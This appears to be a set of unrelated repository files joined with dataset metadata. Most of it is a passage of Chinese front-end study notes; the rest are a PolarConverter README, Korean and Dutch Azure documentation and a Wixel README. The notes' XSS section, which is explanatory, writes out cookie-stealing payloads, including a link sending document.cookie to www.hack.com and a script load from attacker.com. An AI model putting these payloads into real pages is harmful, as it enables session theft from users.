可扩展性 传统的关系型数据库给人一种横向扩展难,不好对数据进行分片的印象,而一些非关系型数据库则原生就支持数据的水平扩展(比如mongodb的sharding机制),并且这可能也是很多NoSQL的一大卖点。其实像Mysql这种关系型数据库的水平扩展也并不是很难,但即使NoSQL水平扩展容易,对于跨分片进行joins这种场景也都没有什么太好的解决办法。不管是关系型还是非关系型数据库,解决水平扩展或者跨分片Joins这种场景,在应用层和数据库层中间加一层中间件来做数据处理也许是个好的办法

3. 数据一致性 非关系型数据库一般强调的是数据最终一致性,而没有像ACID一样强调数据的强一致性,从非关系型数据库中读到的有可能还是处于一个中间态的数据,因此如果你的业务对于数据的一致性要求很高,那么非关系型数据库并不是一个很好的选择。非关系型数据库可能更多地偏向于OLAP场景,而关系型数据库更多偏向于OLTP场景

#### ***linux相关***

***unix、linux、mac相爱相杀***

参考:[unix、linux、mac科普篇][unix&Linux&MacStoryUrl]、[Linux vs Unix][unix&LinuxDiffUrl]

linux是一个采用了unix的设计思想,初始行为表现与unix相同的操作系统,但Linux中的源码并未有任何出自Unix。Linux符合一切皆文件的思想,其中**读写操作都是处理文件描述符**,无论文件描述符后面的是真正要打开的文件,还是进程间通信的套接字,对于用户而言都是**操作**文件描述符。。。

**虚拟内存:**是计算机系统内存管理的一种技术。它使得应用程序认为它拥有连续的可用的内存(一个连续完整的地址空间),而实际上,它通常是被分隔成多个物理内存碎片,还有部分暂时存储在外部磁盘存储器上,在需要时进行数据交换。目前,大多数操作系统都使用了虚拟内存,如Windows家族的“虚拟内存”;Linux的“交换空间”等。

***mac常用命令***

***常用编辑器***

#### ***常见网络攻击***

***XSS:***

跨站脚本攻击(cross site scripting),为了不和层叠样式表(cascading style sheets,css)缩写混淆,所以将跨站脚本攻击缩写为xss。

参考: [xss攻击示例][xssExampleUrl]、[xss攻击转义][xssAttackDecodeURL]、[常见web攻击][usualWebSecurityUrl]

vue等框架在渲染时,大括号语法会将数据渲染为普通文本,而非html代码,如果要输出真正的html,需要使用v-html指令。也就是vue的安全策略,默认把所有动态内容渲染为纯文本,当你需要把内容作为html执行的时候需要显式调用v-html指令,如下:

如果在vue文件里这样写:

```html
<div id="app" >
  Welcome : <span v-html="attack"></span>
</div >
```

```js
new Vue({
  el: '#app',
  data: {
    attack: '<script > alert(document.cookie)</script >',
  }
});
```

但是:上面的alert并不会执行,因为浏览器阻止在初始页面加载后执行注入的脚本标记

但是我们可以这样做:

```js
new Vue({
  el: '#app',
  data: {
    attack: '<a onmouseover=alert(document.cookie)>click me!</a>',
  }
});
```

上面已经拿到了页面的cookie,如果此时再给a标签添加一个href="www.hack.com?ctx=document.cookie",则用户的数据就被发送到其他网页了。。。

当然上面是监听mouseover事件触发js执行,还可以监听任意事件触发,当然img的src属性还可以请求第三方脚本进而执行,如:`<img src="attacker.com/attack.js" />`

xss分类:

- 反射性xss
- 持久性xss
- DOM-based xss

反射性的xss,其实可以理解为前端输入一个字符串,后端拿到之后也没有做处理,然后又直接返回给前端。。。前端也没有做处理,此时如果字符串里含有script标签,则会被执行。。。如果其他用户点击这种类型的链接,则会被攻击。。。

普通xss攻击,通过html转义就可以很好地解决,但是富文本编辑器,本身就是允许输入html标签的,不能转义,需要引入第三方防止xss的包来处理,对文章内html 
进行处理,可以自定义过滤规则,参考:[根据白名单过滤HTML(防止XSS攻击)](https://jsxss.com/zh/index.html) #### ***chrome相关*** 技巧一:打开控制台 -> 右下角`Event Listener Breakpoints`选择事件类型 -> 一直按住||(Pause script excution)键 -> 等到触发指定时间后松手即可进入单步调试状态 -> 进而可以静态 #### ***新技术相关*** ***PWA*** 参考:[PWA开发文档][PWADocumentUrl] Progressive Web App, 简称 PWA,是提升 Web App 的体验的一种新方法,能给用户原生应用的体验。 PWA 能做到原生应用的体验不是靠特指某一项技术,而是经过应用一些新技术进行改进,在安全、性能和体验三个方面都有很大提升,PWA 本质上是 Web App,借助一些新技术也具备了 Native App 的一些特性,兼具 Web App 和 Native App 的优点。 PWA 的主要特点包括下面三点: - 可靠 - 即使在不稳定的网络环境下,也能瞬间加载并展现 - 体验 - 快速响应,并且有平滑的动画响应用户的操作 - 粘性 - 像设备上的原生应用,具有沉浸式的用户体验,用户可以添加到桌面 PWA 本身强调渐进式,并不要求一次性达到安全、性能和体验上的所有要求, ***Service Worker*** 前端工程师有很多性能优化的手段,包括 CDN、CSS Sprite、文件的合并压缩、异步加载、资源缓存等等。其实我们绝大部分情况是在干一件事情,那就是尽量降低一个页面的网络请求成本从而缩短页面加载资源的时间并降低用户可感知的延时。当然减少用户可感知的延时也不仅仅是在网络请求成本层面,还有浏览器渲染效率,代码质量等等。 **那什么是 Service Worker?** 浏览器中的 javaScript 都是运行在一个单一主线程上的,在同一时间内只能做一件事情。随着 Web 业务不断复杂,我们逐渐在 js 中加了很多耗资源、耗时间的复杂运算过程,这些过程导致的性能问题在 WebApp 的复杂化过程中更加凸显出来。 W3C 组织早早的洞察到了这些问题可能会造成的影响,这个时候有个叫 **Web Worker 的 API** 被造出来了,这个 **API 的唯一目的就是解放主线程,Web Worker 是脱离在主线程之外的,将一些复杂的耗时的活交给它干,完成后通过 postMessage 方法告诉主线程,而主线程通过 onMessage 方法得到 Web Worker 的结果反馈**。 一切问题好像是解决了,但 **Web Worker 是临时的,每次做的事情的结果还不能被持久存下来**,如果下次有同样的复杂操作,还得费时间的重新来一遍。那我们能不能有一个Worker 是一直持久存在的,并且随时准备接受主线程的命令呢?基于这样的需求推出了最初版本的 Service Worker ,**Service Worker 在 Web Worker 的基础上加上了持久离线缓存能力**。当然在 **Service Worker 之前也有在 HTML5 上做离线缓存的 API 叫 AppCache**, 但是 AppCache 存在很多 不能忍受的缺点。 W3C 决定 AppCache 仍然保留在 HTML 5.0 Recommendation 中,在 HTML 后续版本中移除。 Service Worker 有以下功能和特性: - 一个独立的 worker 线程,独立于当前网页进程,有自己独立的 worker context。 - 一旦被 install,就永远存在,除非被手动 unregister - 用到的时候可以直接唤醒,不用的时候自动睡眠 - 可编程拦截代理请求和返回,缓存文件,缓存的文件可以被网页进程取到(包括网络离线状态) - 离线内容开发者可控 - 能向客户端推送消息 - 不能直接操作 DOM - 必须在 HTTPS 环境下才能工作 - 异步实现,内部大都是通过 Promise 实现 #### BOM相关 ***window对象*** BOM的核心对象是window,它表示浏览器的一个实例。在浏览器中,window对象有双重角色,即是通过js访问浏览器窗口的一个接口,又是ECMAScript规定的Global对象,因此所有在全局作用域中声明的变量,函数都会变成window对象的属性和方法。 但是定义的全局变量和在window对象上直接定义属性还是有区别的,即全局变量不能通过delete删除,而直接在window对象上定义的可以: ```js aa = 22 window.bb 
= 33 delete aa // false delete window.bb // true console.log(window.aa) // 22 console.log(window.bb) // undefined ``` 主要原因便是默认的属性描述符在作怪,如下 ```js // 参数一是属性所在的对象,参数二是属性名 Object.getOwnPropertyDescriptor(window, 'aa') configurable: false // 这里是false,表示描述符不可改变,切不可从对象上删除 enumerable: true value: 22 writable: true // 定义属性描述符,参考:Object.defineProperty(obj, prop, descriptor) ``` 另外直接访问未声明的变量会报错,但通过window来访问,则不会报错(因为这相当于一次属性查询) ***窗口及框架*** 如果页面中包含框架,则每个框架都有自己的window对象,并且保存在frames集合中,可以通过索引(从0开始,从左向右,从上到下)或框架名来访问相应的window对象,每个window对象都有一个name属性,其中包括框架的名称。如下注意这里不是`iframe`,另外body标签是没有的。 [iframe和frame及frameset的区别][diffBetweenIframe&frameUrl] ```html <!DOCTYPE html> <head> <title>多个iframe的demo</title> </head> <!-- <body> --> <frameset rows="160,*"> <frame src="frame.html" name="topFrame"></frame> <frameset cols="25%,50%,25%"> <frame src="frame_a.htm" name="a"/> <frame src="frame_b.htm" name="b"/> <frame src="frame_c.htm" name="c"/> </frameset> </frameset> <!-- </body> --> </html> ``` 对于上面多框架页面,所有的框架实例都保存在frames集合中,可以如下几种方式访问第一个框架,其他一样。 ```js window.frames[0] window.frames['topFrame'] top.frames[0] top.frames['topFrame'] frames[0] frames['topFrame'] ``` **注意:**top始终指向最高(最外层)的框架,也就是浏览器窗口,使用它可以确保,在一个框架中访问另外一个框架。而对于在一个框架内的代码来说,其中的window对象指向的都是那个框架的特定实例,而非最高层的框架。 与top相对的是parent对象,它始终指向当前框架的直接上层框架。另外与框架相关的另一个self对象,始终指向window对象。引入self的目的只是为了与top和parent对象对应起来。所有这些都是window对象的属性,因此可以将不同层次的window对象连接起来。 ```js self === window // true // 不同层次window对象连接 window.parent.parent.frames[0] ``` 在使用框架的情况下,浏览器中存在多个Global对象,在每个框架中定义的全局变量自动成为框架中window对象的属性,由于每个window对象都包含原生类型的构造函数,因此每个框架都有一套自己的构造函数,这些构造函数一一对应,但并不相等。例如:top.Object并不等于top.frames[0].Object,这个问题会影响到对跨框架传递的对象使用instanceof操作符。 ***导航和打开窗口*** window.open()方法返回的是新窗口的引用,引用对象和其他window对象相似,该方法既可以导航到一个特定的URL,也可以打开一个新的浏览器窗口。有四个参数: - 参数一:要加载的URL - 参数二:窗口目标(可以自定义名,也可以用'_black'则每次都是新页面,还有'_self','_top','_parent') - 参数三:一个设置窗口样式的特性字符串(比如新窗口是否全屏,大小等,逗号分开) - 参数四:新页面是否取代浏览器历史记录中当前加载页面的布尔值(不觉明历) ```js // _self是在当前页打开,此时height,width无效,保持和原始窗口大小一致, // 
参数4不觉明历,history对象的长度无论参数四是true还是false,每打开一次length就会增加1 window.open('http://www.baidu.com','_self','height=400,width=400',true) // 当使用_black,_self,_top,_parent时,新打开的窗口name为空 // 当自定义命名时,每次都打开同一个命名的页面。 // 如果参数二并不是一个已经存在的窗口或框架,那么就会根据参数三来创建一个新窗口或新标签页 // 如果没有参数三,就会打开一个带有全部默认设置的新浏览器窗口 // 在不打开新窗口的情况下,会忽略参数三 ``` window.open会返回一个指向新窗口的引用,对于新窗口打开的页面,可以调用这个引用的close方法关闭新窗口,还可以调整大小及位置 ```js var newWindow = window.open('http://www.baidu.com','_blank','height=400,width=400',true) newWindow.resizeTo(500,500) // 改变大小(可能被禁用) newWindow.resizeBy(100,100) // 增量改变(可能被禁用) newWindow.moveTo(100,100) // 移动位置(可能被禁用) newWindow.close() // 关闭 // 另外新创建的window对象有opener属性,指向打开它的原始窗口对象,且只在弹窗窗口中的最外层window对象(top)中有定义, var newWindow = window.open('http://www.baidu.com','_blank','height=400,width=400',true) newWindow.opener === window // true ``` 有些浏览器会在独立的进程中运行每个标签页,当一个标签页打开另一个标签页时,如果两个window对象之间需要彼此通信,那么新标签页就不能运行在独立的进程中。在chrome中,将新创建的标签页的opener属性设置为null,即表示在单独的进程中运行标签页。一旦断了联系将无法恢复。 ***location*** location是最有用的BOM对象之一,提供了与当前窗口中加载的文档有关的信息,还提供一些导航功能。location是特殊的对象,既是window对象的属性,也是document对象的属性,如下 ```js window.location === document.location // true ``` 另外,location的用途不只表现它保存当前文档的信息,还表现在它将URL解析为独立的片段(比如hash,hostname,href,search等) ```js // 手动解析查询字符串 function getQueryStringArgs(){ let qs = location.search.length > 0 ? location.search.substring(1) : ''; let args = Object.create(null); let items = qs.length ? 
qs.split('&') : []; let name = null, value = null, i = 0, len = items.length; for(i = 0 ;i < len ; i++){ let item = items[i].split('=') name = decodeURIComponent(item[0]) value = decodeURIComponent(item[1]) if(name.length){ args[name] = value } } return args; } ``` 使用location对象可以更改浏览器的位置 ```js location.assign(URL) // 等价于 window.location = URL location.href = URL ``` 使用location.reload可以重新加载页面,如果不传参则可能从缓存里加载(效率高),如果传true则从服务器重新加载 ```js location.reload() // 可能从缓存中加载 location.reload(true) // 从服务器重新加载 ``` ***注册处理程序*** 假如给网页注册处理程序,其实相当于扩展网页的能力。。。如果是注册处理RSS阅读器的处理程序,其实就是让网页具有处理RSS的能力,进而浏览器可以打开RSS相关的资源 ```js navigator.registerProtocolHandler(protocol, url, title) ``` ***screen*** 有时候需要看看屏幕的分辨率,可以使用window.screen,里面的height和width便是高度和宽度的分辨率。当然还有其他的一些参数 ***history*** history是window对象的属性,因此每个浏览器窗口,每个标签页乃至每个框架(比如iframe),都有自己的history对象与特定的window对象关联。但出于安全,无法得知具体的URL,但有访问列表,同样可以在不知URL的情况下实现后退和前进 ```js history.go(2) // 前进两页 history.go(-2) // 后退两页 // 可以传递字符串,表示跳转到历史记录中包含该字符串的第一个位置,可能前进可能后退 history.go('test.com') // go的简写方式 history.back() // 相当于后退键 history.forward() // 相当于前进键 ``` #### ***ES6+集锦*** ES6 规范定义了一个新概念,叫作 TDZ(Temporal Dead Zone,暂时性死区)。 **TDZ**指的是由于代码中的变量还没有初始化而不能被引用的情况。 对此,最直观的例子是 ES6 规范中的 let 块作用域: ```js { a = 2; // ReferenceError! let a; } ``` a = 2试图在let a初始化a之前使用该变量(其作用域在{ .. }内),这里就是a的 TDZ,会产生错误。 有意思的是,对未声明变量使用 typeof 不会产生错误(参见第 1 章),但在 TDZ 中却会报错: ```js { typeof a; // undefined typeof b; // ReferenceError! (TDZ) let b; } ``` 1. 支付逻辑, 2. 埋点逻辑 3. docker 4. 小程序 5. 部署脚本 6. 框架 7. cas单点登录 8. vue源码 9. ts 10. jenkins 11. 数据结构及算法 13. 微信sdk,授权,支付,分享 14. 唤起app 15. 线程,进程,微任务,宏任务 16. Socket协议 17. 
http5,css3,canvas,常见攻击,websocket,pwa, #### ***svg,canvas,js,css动画*** canvas是祯动画,意味着每个动作都是一个截图,最后是把截图播放……感觉那么多祯很耗费性能,但它有分层的概念,意味着如果有这层不变,可以重复利用……另外就是canvas没有具体元素的概念,都是坐标位置,因此就无法对某个元素添加事件……而svg不但是矢量图,还有具体的元素,因此可以基于元素做些操作,而css3动画很大程度上是浏览器封装实现的,再加上gpu加速,因此性能上很好,但缺点是无法做多个元素组合的动画(比如两个人打架),因为两个元素的时间很难放在同一个起点上……而js动画的,就比较好操作了…… #### docker使用 参考:[docker从入门到实践](https://yeasy.gitbooks.io/docker_practice/image/dockerfile/cmd.html) #### 常用链接 [cssPxDevicePxUrl]: https://github.com/jawil/blog/issues/21 [androidViewportWidthSizeUrl]: http://viewportsizes.com [taoBaoFlexibleUrl]: https://www.kancloud.cn/chandler/web_app/353540 [commonRegexUrl]: https://juejin.im/post/5b96a8e2e51d450e6a2de115 [allRegexUnitUrl]: http://tool.oschina.net/uploads/apidocs/jquery/regexp.html [mdnRegexUrl]: https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Guide/Regular_Expressions [justTalkSandboxUrl]: http://www.nowamagic.net/javascript/js_SandBox.php [JavaScriptSandboxUrl]: https://segmentfault.com/a/1190000006808445 <!-- CSS相关 --> [marginCollapsingUrl]: https://developer.mozilla.org/zh-CN/docs/Web/CSS/CSS_Box_Model/Mastering_margin_collapsing [w3choolCssSelectorUrl]: http://www.w3school.com.cn/cssref/css_selectors.ASP [frontEndDatabaseUrl]: https://leohxj.gitbooks.io/front-end-database/index.html [tenDesignStylesUrl]: https://juejin.im/entry/58c280b1da2f600d8725b887 <!-- --> [mdnHttpStatusCodesUrl]: https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Status [html5MdnUrl]: https://developer.mozilla.org/zh-CN/docs/Web/Guide/HTML/HTML5 [html5&css3NewFeatureUrl]: https://yq.aliyun.com/articles/610581 [indexedDB(ruanyifeng)]: http://www.ruanyifeng.com/blog/2018/07/indexeddb.html [whatIsSocketUrl]: http://www.cnblogs.com/skynet/archive/2010/12/12/1903949.html [frontEndOptimizeUrl]: https://juejin.im/post/5a966bd16fb9a0635172a50a [vueOptimizeUrl]: https://juejin.im/post/5b960fcae51d450e9d645c5f [vue3.0OptimizeUrl]: https://yuccie.github.io/jsArt/2018/11/vue3/ [eightCssOptimizeUrl]: 
https://juejin.im/post/5b6133a351882519d346853f [vueLazeloadTheoryUrl]: https://arron-chen.github.io/2017/10/27/vue-lazyload/ <!-- linux相关 --> [unix&Linux&MacStoryUrl]: https://blog.csdn.net/zhanghow/article/details/53542397 [unix&LinuxDiffUrl]: https://news.mydrivers.com/1/580/580273.htm [aboutCdnUrl]: http://genie88.github.io/2015/11/03/talk-about-content-delivery-network-and-caches/ [aboutCdnHuiYuanUrl]: https://juejin.im/post/5af46498f265da0b8d41f6a3 [aboutConsultCacheUrl]: https://imweb.io/topic/5795dcb6fb312541492eda8c [aboutForceCacheUrl]: https://juejin.im/entry/5ad86c16f265da505a77dca4 [browserCacheAnalyseUrl]: https://github.com/zhengweikeng/blog/issues/5 [exports&exportDiffUrl]: https://github.com/aooy/blog/issues/5 [tenMinuteReadDockerUrl]: https://www.ithome.com/html/win10/402469.htm [k8sAndDockerUrl]: http://dockone.io/article/2682 [babelChineseDocsUrl]: https://www.babeljs.cn/docs/plugins [SuperAgentAndRequestUrl]: http://web.jobbole.com/94160/ [crossSiteUrl]: https://juejin.im/post/5c23993de51d457b8c1f4ee1 [xssExampleUrl]: https://blog.sqreen.io/xss-in-vue-js/ [xssAttackDecodeURL]: http://www.hangge.com/blog/cache/detail_1774.html [PWADocumentUrl]: https://lavas.baidu.com/pwa/README [crossSiteJWTUrl]: http://www.ruanyifeng.com/blog/2018/07/json_web_token-tutorial.html [onePageReadSSOUrl]: https://cloud.tencent.com/developer/article/1330311 [frontEndProjectUrl]: https://www.zhihu.com/question/24558375 [howIUnderstandFrontEndProjectUrl]: https://juejin.im/post/58ac334e8d6d810058c103e0 [allFrontEndResourceUrl]: https://juejin.im/entry/58063ed52e958a0055ece967 [bigCompanyHowToDeployFrontEndCodeUrl]: https://www.zhihu.com/question/20790576 [nextTickAndMutationObserverUrl]: https://github.com/Ma63d/vue-analysis/issues/6 [frontEndResourceOneUrl]: https://yuchengkai.cn/docs/frontend/#内置类型 [middleAndHighLevelIterviewUrl]: https://juejin.im/post/5c64d15d6fb9a049d37f9c20?utm_source=gold_browser_extension [whatImpliedTransformHappened]: 
https://juejin.im/post/5c6adcd7e51d4542331c5a2e?utm_source=gold_browser_extension [quickSortUrl(ruanyifeng)]: http://www.ruanyifeng.com/blog/2011/04/quicksort_in_javascript.html [vueTwoDirectionDataBindUrl]: https://github.com/DMQ/mvvm [vueTheroySkillUrl]: https://ustbhuangyi.github.io/vue-analysis/reactive/reactive-object.html#initstate [vueSourceCodeAnalyzeUrl]: https://github.com/Ma63d/vue-analysis/issues/1 [popularReadVueTwoDirectionDataBindUrl]: https://blog.csdn.net/sir1241/article/details/79208038 [usualWebSecurityUrl]: https://zoumiaojiang.com/article/common-web-security/ [addOperatorUrl]: https://www.w3cplus.com/javascript/javascriptss-addition-operator-demystified.html [minusOperatorUrl]: http://www.wenjiangs.com/article/javascript-string-number.html '减号运算符' [nullAndundefined(阮一峰)]: http://www.ruanyifeng.com/blog/2014/03/undefined-vs-null.html [jsEngineerShouldKonw33Concept]: https://zhuanlan.zhihu.com/p/48049957 [howRexExpWorkUrlRuanYiFeng]: http://javascript.ruanyifeng.com/stdlib/regexp.html [fastClickUseInstruction]: https://github.com/ftlabs/fastclick [aboutJsYouNeedKonw]: https://www.kancloud.cn/xiak/quanduan/369159 [diffBetweenIframe&frameUrl]: https://www.haorooms.com/post/html_frameset_contro 'iframe及frame的区别' [handleScrollTabURL]: https://github.com/pod4g/tool/wiki/%E7%A7%BB%E5%8A%A8%E7%AB%AF%E6%BB%9A%E5%8A%A8%E7%A9%BF%E9%80%8F%E9%97%AE%E9%A2%98 '滚动穿透' [howBrowsersworkUrl]: https://www.html5rocks.com/zh/tutorials/internals/howbrowserswork/ '浏览器的工作原理:新式网络浏览器幕后揭秘' [aboutBrowserDefaultUrl]: https://stackoverflow.com/questions/14496694/whats-default-value-of-cache-control '浏览器的默认策略'
29.199086
383
0.736032
yue_Hant
0.67542
6f4513e0ff1af225796b184fd520c12d82689613
275
md
Markdown
README.md
goldnarms/PolarConverter
860fff51b4723431e7522798ed42ee544fb526dc
[ "MIT" ]
null
null
null
README.md
goldnarms/PolarConverter
860fff51b4723431e7522798ed42ee544fb526dc
[ "MIT" ]
null
null
null
README.md
goldnarms/PolarConverter
860fff51b4723431e7522798ed42ee544fb526dc
[ "MIT" ]
null
null
null
PolarConverter ============== Converting polar files to endomondo and strava compatible formats External apps https://console.developers.google.com/project https://apps.twitter.com/app/6309235/keys https://developers.facebook.com/apps/128362510636193/settings/advanced/
21.153846
71
0.781818
kor_Hang
0.341104
6f47234729aaa6115b50cc7eb8adf3018c4eeeed
3,490
md
Markdown
articles/azure-resource-manager/custom-providers/tutorial-custom-providers-function-setup.md
youngick/azure-docs.ko-kr
b6bc928fc360216bb122e24e225a5b7b0ab51d7e
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/azure-resource-manager/custom-providers/tutorial-custom-providers-function-setup.md
youngick/azure-docs.ko-kr
b6bc928fc360216bb122e24e225a5b7b0ab51d7e
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/azure-resource-manager/custom-providers/tutorial-custom-providers-function-setup.md
youngick/azure-docs.ko-kr
b6bc928fc360216bb122e24e225a5b7b0ab51d7e
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: Set up Azure Functions
description: This tutorial covers how to create an Azure function app and set it up to work with Azure custom providers.
author: jjbfour
ms.topic: tutorial
ms.date: 06/19/2019
ms.author: jobreen
ms.openlocfilehash: 55554678047faeedd16b78dea61a42d50fd59491
ms.sourcegitcommit: 78ecfbc831405e8d0f932c9aafcdf59589f81978
ms.translationtype: HT
ms.contentlocale: ko-KR
ms.lasthandoff: 01/23/2021
ms.locfileid: "99822358"
---
# <a name="set-up-azure-functions-for-azure-custom-providers"></a>Set up Azure Functions for Azure custom providers

A custom provider is a contract between Azure and an endpoint. With custom providers, you can change workflows in Azure. This tutorial shows how to set up an Azure function app to work as a custom provider endpoint.

## <a name="create-the-azure-function-app"></a>Create the Azure function app

> [!NOTE]
> In this tutorial, you create a simple service endpoint that uses an Azure function app. However, a custom provider can use any publicly accessible endpoint. Alternatives include Azure Logic Apps, Azure API Management, and the Web Apps feature of Azure App Service.

To start this tutorial, you should first complete the tutorial [Create your first Azure function app in the Azure portal](../../azure-functions/functions-get-started.md). That tutorial creates a .NET Core webhook function that can be modified in the Azure portal, and it is also the foundation for the current tutorial.

## <a name="install-azure-table-storage-bindings"></a>Install Azure Table storage bindings

To install the Azure Table storage bindings:

1. Go to the **Integrate** tab for the HttpTrigger.
1. Select **+ New Input**.
1. Select **Azure Table Storage**.
1. Install the Microsoft.Azure.WebJobs.Extensions.Storage extension if it isn't already installed.
1. In the **Table parameter name** box, enter **tableStorage**.
1. In the **Table name** box, enter **myCustomResources**.
1. Select **Save** to save the updated input parameter.

![Custom provider overview showing table bindings](./media/create-custom-provider/azure-functions-table-bindings.png)

## <a name="update-restful-http-methods"></a>Update RESTful HTTP methods

To set up the Azure function to include the custom provider RESTful request methods:

1. Go to the **Integrate** tab for the HttpTrigger.
1. Under **Selected HTTP methods**, select **GET**, **POST**, **DELETE**, and **PUT**.

![Custom provider overview showing HTTP methods](./media/create-custom-provider/azure-functions-http-methods.png)

## <a name="add-azure-resource-manager-nuget-packages"></a>Add Azure Resource Manager NuGet packages

> [!NOTE]
> If the C# project file is missing from the project directory, you can add it manually. Or it will appear after the Microsoft.Azure.WebJobs.Extensions.Storage extension is installed on the function app.

Next, update the C# project file to include helpful NuGet libraries. These libraries make it easier to parse incoming requests from custom providers. Follow the steps to [add extensions from the portal](../../azure-functions/functions-bindings-register.md) and update the C# project file to include the following package references:

```xml
<PackageReference Include="Microsoft.Azure.WebJobs.Extensions.Storage" Version="3.0.4" />
<PackageReference Include="Microsoft.Azure.Management.ResourceManager.Fluent" Version="1.22.2" />
<PackageReference Include="Microsoft.Azure.WebJobs.Script.ExtensionsMetadataGenerator" Version="1.1.*" />
```

The following XML element is an example C# project file:

```xml
<Project Sdk="Microsoft.NET.Sdk">
    <PropertyGroup>
        <TargetFramework>netstandard2.0</TargetFramework>
        <WarningsAsErrors />
    </PropertyGroup>
    <ItemGroup>
        <PackageReference Include="Microsoft.Azure.WebJobs.Extensions.Storage" Version="3.0.4" />
        <PackageReference Include="Microsoft.Azure.Management.ResourceManager.Fluent" Version="1.22.2" />
        <PackageReference Include="Microsoft.Azure.WebJobs.Script.ExtensionsMetadataGenerator" Version="1.1.*" />
    </ItemGroup>
</Project>
```

## <a name="next-steps"></a>Next steps

In this tutorial, you set up an Azure function app to work as an Azure custom provider endpoint. To learn how to author a RESTful custom provider endpoint, see [Tutorial: Authoring a RESTful custom provider endpoint](./tutorial-custom-providers-function-authoring.md).
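The tutorial above wires GET, POST, DELETE, and PUT into a single HttpTrigger, which then dispatches on the method to create, read, or delete the custom resource backed by Table storage. As a language-neutral illustration (not the tutorial's C# code), the sketch below models that dispatch with a plain dict standing in for the Azure Table storage binding; the handler name and return shape are hypothetical.

```python
def handle_request(method, store, resource_id, payload=None):
    """Dispatch GET/PUT/DELETE the way a custom-provider resource endpoint
    would, using a dict in place of the Azure Table storage binding.
    Returns a (status_code, body) pair."""
    method = method.upper()
    if method == "PUT":              # create or update the custom resource
        store[resource_id] = payload or {}
        return 200, store[resource_id]
    if method == "GET":              # retrieve the custom resource
        if resource_id in store:
            return 200, store[resource_id]
        return 404, None
    if method == "DELETE":           # remove the custom resource
        return 200, store.pop(resource_id, None)
    return 405, None                 # POST (custom actions) handled similarly

store = {}
assert handle_request("PUT", store, "res1", {"sku": "basic"})[0] == 200
assert handle_request("GET", store, "res1")[1] == {"sku": "basic"}
assert handle_request("DELETE", store, "res1")[0] == 200
assert handle_request("GET", store, "res1")[0] == 404
```

The real endpoint additionally has to parse the resource ID out of the request path and persist through the `tableStorage` binding configured above, but the method-to-action mapping is the same.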
42.560976
220
0.740974
kor_Hang
0.999951
6f4729ffdb5ec7fe289d985f486fcb927e222d5b
3,264
md
Markdown
articles/security/fundamentals/best-practices-and-patterns.md
RobAaldijk/azure-docs.nl-nl
519c7fc80075795af2670d665d1d93078faf7a87
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/security/fundamentals/best-practices-and-patterns.md
RobAaldijk/azure-docs.nl-nl
519c7fc80075795af2670d665d1d93078faf7a87
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/security/fundamentals/best-practices-and-patterns.md
RobAaldijk/azure-docs.nl-nl
519c7fc80075795af2670d665d1d93078faf7a87
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: Security best practices and patterns - Microsoft Azure | Microsoft Docs
description: This article links to security best practices and patterns for different Azure resources.
services: azure-security
documentationcenter: na
author: TerryLanfear
manager: barbkess
editor: TomSh
ms.assetid: 1cbbf8dc-ea94-4a7e-8fa0-c2cb198956c5
ms.service: security
ms.subservice: security-fundamentals
ms.devlang: na
ms.topic: conceptual
ms.tgt_pltfrm: na
ms.workload: na
ms.date: 5/03/2019
ms.author: terrylan
ms.openlocfilehash: f4a3b2afd8b1a5ffdbb1fe0db1c3e345a9c99154
ms.sourcegitcommit: 17b36b13857f573639d19d2afb6f2aca74ae56c1
ms.translationtype: MT
ms.contentlocale: nl-NL
ms.lasthandoff: 11/10/2020
ms.locfileid: "94412609"
---
# <a name="azure-security-best-practices-and-patterns"></a>Azure security best practices and patterns

The articles below contain security best practices to use when you're designing, deploying, and managing your cloud solutions by using Azure. These best practices come from our experience with Azure security and the experiences of customers like you.

The best practices are intended to be a resource for IT pros. This might include designers, architects, developers, and testers who build and deploy secure Azure solutions.

* [Azure boundary security best practices](./network-best-practices.md#adopt-a-zero-trust-approach)
* [Azure database security best practices](../../azure-sql/database/security-best-practice.md)
* [Azure data security and encryption best practices](data-encryption-best-practices.md)
* [Azure identity management and access control security best practices](identity-management-best-practices.md)
* [Azure network security best practices](network-best-practices.md)
* [Azure operational security best practices](operational-best-practices.md)
* [Azure PaaS best practices](paas-deployments.md)
* [Azure Service Fabric security best practices](service-fabric-best-practices.md)
* [Azure VM security best practices](iaas.md)
* [Implementing a secure hybrid network architecture in Azure](/azure/architecture/reference-architectures/dmz/secure-vnet-hybrid)
* [Internet of Things security best practices](../../iot-fundamentals/iot-security-best-practices.md)
* [Securing PaaS databases in Azure](paas-applications-using-sql.md)
* [Securing PaaS web and mobile applications using Azure App Service](paas-applications-using-app-services.md)
* [Securing PaaS web and mobile applications using Azure Storage](paas-applications-using-storage.md)
* [Security best practices for IaaS workloads in Azure](iaas.md)

The white paper [Security best practices for Azure solutions](https://azure.microsoft.com/resources/security-best-practices-for-azure-solutions) is a collection of the security best practices found in the articles listed above.

[Download the white paper](https://azure.microsoft.com/mediahandler/files/resourcefiles/security-best-practices-for-azure-solutions/Azure%20Security%20Best%20Practices.pdf)
66.612245
284
0.82261
nld_Latn
0.972245
6f475a19cd1c526b52eba73a4540026b068a3a0c
220
md
Markdown
github-actions/wixel-build/README.md
kaikok/wixel-sdk
fdb99b02bc9d77438e4c067015f89da965ff36a0
[ "MIT" ]
null
null
null
github-actions/wixel-build/README.md
kaikok/wixel-sdk
fdb99b02bc9d77438e4c067015f89da965ff36a0
[ "MIT" ]
null
null
null
github-actions/wixel-build/README.md
kaikok/wixel-sdk
fdb99b02bc9d77438e4c067015f89da965ff36a0
[ "MIT" ]
null
null
null
# Wixel build action

This action provides a docker container with the SDCC build tools to compile the Wixel firmware.

## Inputs

No inputs required.

## Outputs

No outputs generated.

## Example usage

Not published.
13.75
96
0.759091
eng_Latn
0.993302
6f47e0dd2204c99630490c9d9001df2847b54ed7
4,677
md
Markdown
README.md
szaimen/NcVM-migration
f9b19f30914169a82be3072220960c9436b75e43
[ "MIT" ]
1
2021-02-05T05:32:25.000Z
2021-02-05T05:32:25.000Z
README.md
szaimen/NcVM-migration
f9b19f30914169a82be3072220960c9436b75e43
[ "MIT" ]
3
2020-08-14T23:25:35.000Z
2021-11-29T21:20:10.000Z
README.md
szaimen/NcVM-migration
f9b19f30914169a82be3072220960c9436b75e43
